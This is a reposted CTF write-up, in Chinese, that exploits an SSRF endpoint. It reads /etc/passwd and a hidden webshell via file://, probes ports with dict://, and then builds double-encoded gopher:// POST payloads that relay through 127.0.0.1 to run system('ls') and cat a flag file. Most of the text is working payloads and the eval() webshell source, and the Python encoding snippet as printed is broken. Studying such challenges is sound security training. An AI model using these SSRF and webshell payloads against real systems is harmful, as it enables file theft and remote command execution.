ssrf漏洞 CTF

扫描

/index.php

/robots.txt

User-agent: *
Disallow: /webshe11231231231.php

http://*:8016/index.php?url=www.baidu.com

http://*:8016/index.php?url=file:///etc/passwd  读取文件

http://*:8016/index.php?url=file:///var/www/html

http://*:8016/index.php?url=file:///usr/share/html

http://*:8016/index.php?url=file:///var/www/html/webshe11231231231.php

<?php

// Challenge webshell recovered through the file:// read shown above.
// It is an eval() sink on POST input, gated by two checks:
//   1. the requesting address must be one of $serverList (only 127.0.0.1
//      here), so a request arriving from outside never reaches eval() --
//      this is why the rest of the write-up relays the request through the
//      SSRF endpoint on the same host;
//   2. the POST field "admin" must equal the fixed string 'h1admin'.
$serverList = array(
    "127.0.0.1"
);
// Address of the client that sent this request.
$ip = $_SERVER['REMOTE_ADDR'];
foreach ($serverList as $host) {
    if ($ip === $host) {
        if ((!empty($_POST['admin'])) and $_POST['admin'] === 'h1admin') {
            // Executes arbitrary PHP taken from the POST body; the '@'
            // suppresses any parse/runtime errors eval() would report.
            @eval($_POST['hacker']);
        } else {
            die("You aren't admin!");
        }
    } else {
        // Every non-matching entry ends the request here, so with more than
        // one address in $serverList only the first would ever be compared;
        // with the single entry above this does not matter.
        die('This is webshell');
    }
}

webshell 要求从本地(127.0.0.1)访问，所以

在repeater里面右上角设置target 127.0.0.1 80

GET /index.php?url=file:///var/www/html/webshe11231231231.php 

改为

GET //webshe11231231231.php 

POST //webshe11231231231.php 

hacker=phpinfo();&admin=h1admin

hacker=system('ls')&admin=h1admin

坑比较多：首先必须添加上面这种命令，另外还需要为 POST 请求定义下面两个头部：

Content-Type:application/x-www-form-urlencoded
Content-Length: 34  长度须与上述 POST 数据的长度一致

http://*:8016/index.php?url=dict:///127.0.0.1:80 探测端口

用 gopher 协议将请求打包发送，以利用本地的 webshell

# First URL-encoding pass. `test` is not defined on the page (presumably the
# raw HTTP request text); `urllib.quote` is the Python 2 name of
# urllib.parse.quote. Note the next line reads `temp`, which looks like a
# typo for `tmp`, and its first string literal carries a stray '' -- the
# snippet as printed does not parse.
tmp=urllib.quote(test)

new =temp.replace(''%0A","%0D%0A")       ## turn bare LF (%0A) into CRLF (%0D%0A), i.e. "\r\n" instead of "\n" between HTTP lines

result='_'+urllib.quote(new)                          ## second encoding pass (the page's payloads are double-encoded, e.g. %2520); the leading '_' is a throwaway first byte -- original comment: "the first packet is invalid"

print(result)

进行转码，然后直接访问：

_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A
view-source:http://*:8016/index.php?url=gopher://127.0.0.1:80/_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A
_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252034%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527ls%2527%2529%253B%250D%250A
_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527cat%2520fl1234aaaaaggggg.php%2527%2529%253B%250D%250A
http://*:8016/?url=gopher://127.0.0.1:80/_POST%2520/webshe11231231231.php%2520HTTP/1.1%250D%250AHost%253A%2520152.136.63.75%253A8016%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/79.0.3945.88%2520Safari/537.36%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252Cimage/apng%252C%252A/%252A%253Bq%253D0.8%252Capplication/signed-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520PHPSESSID%253D4qr2nh06mvqdgth0icftvn4ar3%250D%250AConnection%253A%2520close%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Aadmin%253Dh1admin%2526hacker%253Dsystem%2528%2527cat%2520fl1234aaaaaggggg.php%2527%2529%253B%250D%250A


转载自blog.csdn.net/zb0567/article/details/105660231